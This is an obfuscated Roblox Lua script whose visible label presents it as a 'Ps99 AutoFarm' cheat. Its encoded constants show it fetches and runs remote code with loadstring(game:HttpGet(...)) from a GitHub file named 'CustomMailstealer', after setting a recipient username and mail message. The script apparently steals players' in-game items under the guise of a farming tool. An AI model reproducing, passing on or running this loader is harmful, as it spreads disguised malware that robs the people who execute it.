--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (0==v82) then v83=v2(v0(v30,16));if v19 then local v99=0;local v100;while true do if (v99==0) then v100=v5(v83,v19);v19=nil;v99=1;end if (v99==1) then return v100;end end else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==0) then v85=(v31/((5 -(1640 -(1523 + 114)))^(v32-(1 -(0 + 0)))))%((2 -0)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + ((1997 -(68 + 997)) -((2127 -(226 + 1044)) + (322 -248))))) ;return v85-(v85%(569 -(367 + 201))) ;end end else local v86=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=(467 -(87 + 263)) -(32 + 85) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=1 + 0 ;end end end local function v22()local v36=180 -(67 + (1065 -(802 + 150))) ;local v37;local v38;while true do if (v36==(1 + 0)) then return (v38 * 256) + v37 ;end if (v36==0) then v37,v38=v1(v16,v18,v18 + (4 -2) );v18=v18 + 2 + 0 ;v36=3 -2 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (10 -6) ;return (v42 * (30433252 -13656036)) + (v41 * (47703 + 17833)) + (v40 * (1253 -(915 + (232 -150)))) + v39 ;end local function v24()local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(0 -0)) then v44=v23();v45=v23();v43=1;end if (v43==((421 + 768) -(1069 + 118))) then v48=v20(v45,21,31);v49=((v20(v45,72 -40 )==(1 -0)) and  -(1 + 0)) or ((3 -2) -0) ;v43=(10 -7) + 0 ;end if (v43==((1653 -(814 + 45)) -(368 + 423))) then if (v48==(0 -0)) then if (v47==(18 -(10 + 8))) then return v49 * ((0 -0) -0) ;else local v101=442 -(416 + 26) ;while true do if (v101==0) then v48=3 -2 ;v46=0 + 0 ;break;end end end elseif (v48==(3621 -1574)) then return ((v47==0) and (v49 * (((779 -340) -(145 + 16 + 277))/0))) or (v49 * NaN) ;end return v8(v49,v48-1023 ) * (v46 + (v47/((432 -(44 + 386))^(1538 -(998 + 488))))) ;end if (v43==(1 + (1423 -(630 + 793)))) then v46=1 + 0 ;v47=(v20(v45,773 -(201 + (1934 -1363)) ,20) * ((1140 -((549 -433) + 403 + 619))^(133 -101))) + v44 ;v43=2 + 0 ;end end end local function v25(v50)local v51=0;local v52;local v53;while true do if (v51==(0 -(0 + 0))) then v52=nil;if  not v50 then v50=v23();if (v50==(1747 -(760 + 987))) then return "";end end v51=1;end if (v51==2) then v53={};for v89=1914 -(1789 + 124) , #v52 do v53[v89]=v2(v1(v3(v52,v89,v89)));end v51=769 -(745 + 21) ;end if (v51==(2 + 1 + 0)) then return v6(v53);end if (v51==1) then v52=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;v51=7 -5 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;while true do local v67=0;while true do if (v67~=0) then else if (v54==(3 -1)) then local v97=0 -0 ;while true do local v102=0 -0 ;while true do if (v102==(0 + 0)) then if (v97==1) then return v58;end if (v97==(0 + 0)) then local v110=396 -(115 + 281) ;while true do if (v110==(2 -1)) then v97=1 + 0 ;break;end if (v110~=0) then else for v146=1,v23() do local v147=0;local v148;local v149;while true do if (v147==(2 -1)) then while true do if ((0 -0)~=v148) then else v149=v21();if (v20(v149,1,1)~=0) then else local v179=867 -(550 + 317) ;local v180;local v181;local v182;local v183;while true do if (v179==(2 -0)) then while true do if (v180~=2) then else if (v20(v182,1,1)==1) then v183[2 -0 ]=v60[v183[5 -3 ]];end if (v20(v182,287 -(134 + 151) ,1667 -(970 + 695) )==(1 -0)) then v183[1993 -(582 + 1408) ]=v60[v183[3]];end v180=10 -7 ;end if (v180==1) then v183={v22(),v22(),nil,nil};if (v181==(0 -0)) then local v191=0;local v192;local v193;while true do if (v191~=1) then else while true do if ((241 -(187 + 54))==v192) then v193=780 -(162 + 618) ;while true do if (0==v193) then v183[3]=v22();v183[3 + 1 ]=v22();break;end end break;end end break;end if (v191==0) then v192=0;v193=nil;v191=1;end end elseif (v181==1) then v183[3]=v23();elseif (v181==2) then v183[2 + 1 ]=v23() -((3 -1)^(26 -10)) ;elseif (v181~=(1 + 2)) then else local v198=0;local v199;local v200;while true do if (v198==(1636 -(1373 + 263))) then v199=1000 -(451 + 549) ;v200=nil;v198=1 + 0 ;end if (v198~=(1 -0)) then else while true do if (v199~=(0 -0)) then else v200=0;while true do if (v200==(1384 -(746 + 638))) then v183[3]=v23() -(2^(7 + 9)) ;v183[4]=v22();break;end end break;end end break;end end end v180=2 -0 ;end if (v180==3) then if (v20(v182,344 -(218 + 123) ,3)==(1582 -(1535 + 46))) then v183[4]=v60[v183[4 + 0 ]];end v55[v146]=v183;break;end if (v180==(0 + 0)) then local v186=560 -(306 + 254) ;while true do if (v186~=0) then else v181=v20(v149,1 + 1 ,5 -2 );v182=v20(v149,1471 -(899 + 568) ,6);v186=1;end if (1==v186) then v180=1 + 0 ;break;end end end end break;end if (0~=v179) then else v180=0;v181=nil;v179=2 -1 ;end if (v179==(604 -(268 + 335))) then v182=nil;v183=nil;v179=292 -(60 + 230) ;end end end break;end end break;end if (v147==(572 -(426 + 146))) then v148=0;v149=nil;v147=1 + 0 ;end end end for v150=1457 -(282 + 1174) ,v23() do v56[v150-1 ]=v28();end v110=812 -(569 + 242) ;end end end break;end end end end if (1==v54) then local v98=0 -0 ;while true do if (v98==2) then v54=1 + 1 ;break;end if (v98~=(1024 -(706 + 318))) then else v59=v23();v60={};v98=1;end if (v98==1) then for v104=1,v59 do local v105=1251 -(721 + 530) ;local v106;local v107;local v108;local v109;while true do if (v105==1) then v108=nil;v109=nil;v105=2;end if (v105==2) then while true do if (v106==0) then local v152=0;while true do if (v152~=0) then else v107=1271 -(945 + 326) ;v108=nil;v152=2 -1 ;end if (v152~=1) then else v106=1;break;end end end if (v106==1) then v109=nil;while true do if (v107==0) then local v171=0 + 0 ;local v172;while true do if (v171==(700 -(271 + 429))) then v172=0;while true do if (v172==1) then v107=1 + 0 ;break;end if (0==v172) then local v184=0;while true do if (v184==(1501 -(1408 + 92))) then v172=1;break;end if (v184~=(1086 -(461 + 625))) then else v108=v21();v109=nil;v184=1289 -(993 + 295) ;end end end end break;end end end if (v107~=1) then else if (v108==(1 + 0)) then v109=v21()~=(1171 -(418 + 753)) ;elseif (v108==2) then v109=v24();elseif (v108~=3) then else v109=v25();end v60[v104]=v109;break;end end break;end end break;end if (v105==0) then v106=0 + 0 ;v107=nil;v105=1 + 0 ;end end end v58[3]=v21();v98=2;end end end v67=1 + 0 ;end if (v67~=1) then else if (v54==0) then v55={};v56={};v57={};v58={v55,v56,nil,v57};v54=1;end break;end end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v68=v64;local v69=v65;local v70=v66;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (v88==1) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then v72=v80[3];else v72=v80[3];end elseif (v81<=2) then local v113=0;local v114;local v115;local v116;local v117;while true do if (v113==1) then v73=(v116 + v114) -1 ;v117=0;v113=2;end if (0==v113) then v114=v80[2];v115,v116=v71(v78[v114](v13(v78,v114 + 1 ,v80[3])));v113=1;end if (v113==2) then for v156=v114,v73 do local v157=0;while true do if (v157==0) then v117=v117 + 1 ;v78[v156]=v115[v117];break;end end end break;end end elseif (v81>3) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v63;else v78[v80[2]]=v63[v80[3]];end else do return;end end elseif (v81<=7) then if (v81<=5) then local v118=v80[2];local v119=v78[v80[3]];v78[v118 + 1 ]=v119;v78[v118]=v119[v80[4]];elseif (v81>6) then local v131=0;local v132;local v133;while true do if (v131==0) then v132=v80[2];v133=v78[v80[3]];v131=1;end if (v131==1) then v78[v132 + 1 ]=v133;v78[v132]=v133[v80[4]];break;end end else local v134=0;local v135;local v136;local v137;local v138;while true do if (v134==1) then v73=(v137 + v135) -1 ;v138=0;v134=2;end if (v134==2) then for v174=v135,v73 do v138=v138 + 1 ;v78[v174]=v136[v138];end break;end if (v134==0) then v135=v80[2];v136,v137=v71(v78[v135](v13(v78,v135 + 1 ,v80[3])));v134=1;end end end elseif (v81<=8) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>9) then do return;end else v63[v80[3]]=v78[v80[2]];end elseif (v81<=15) then if (v81<=12) then if (v81==11) then v78[v80[2]]=v80[3];else local v125=v80[2];v78[v125]=v78[v125](v13(v78,v125 + 1 ,v73));end elseif (v81<=13) then for v129=v80[2],v80[3] do v78[v129]=nil;end elseif (v81==14) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v63[v80[3]]=v78[v80[2]];end elseif (v81<=18) then if (v81<=16) then local v127=v80[2];v78[v127]=v78[v127](v13(v78,v127 + 1 ,v73));elseif (v81>17) then v78[v80[2]]=v80[3];else for v154=v80[2],v80[3] do v78[v154]=nil;end end elseif (v81<=19) then v78[v80[2]]();elseif (v81>20) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v63;else v78[v80[2]]=v63[v80[3]];end else v78[v80[2]]();end v72=v72 + 1 ;break;end if (0==v88) then v80=v68[v72];v81=v80[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O73616765030C3O004D6F7269206F6E20746F7021030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657203083O00557365726E616D6503093O004F646B64626662666A030F3O00475F4C6F6164696E675363722O656E030E3O0050732O39204175746F4661726D21001C3O00120B3O00014O0011000100013O0026083O00020001000100044O0002000100120B000100013O002608000100110001000200044O0011000100120B000200043O001209000200033O001204000200053O001204000300063O00200500030003000700120B000500084O0006000300054O001000023O00022O001300020001000100044O001B0001002608000100050001000100044O0005000100120B0002000A3O001209000200093O00120B0002000C3O0012090002000B3O00120B000100023O00044O0005000100044O001B000100044O000200012O000A3O00017O00",v9(),...);
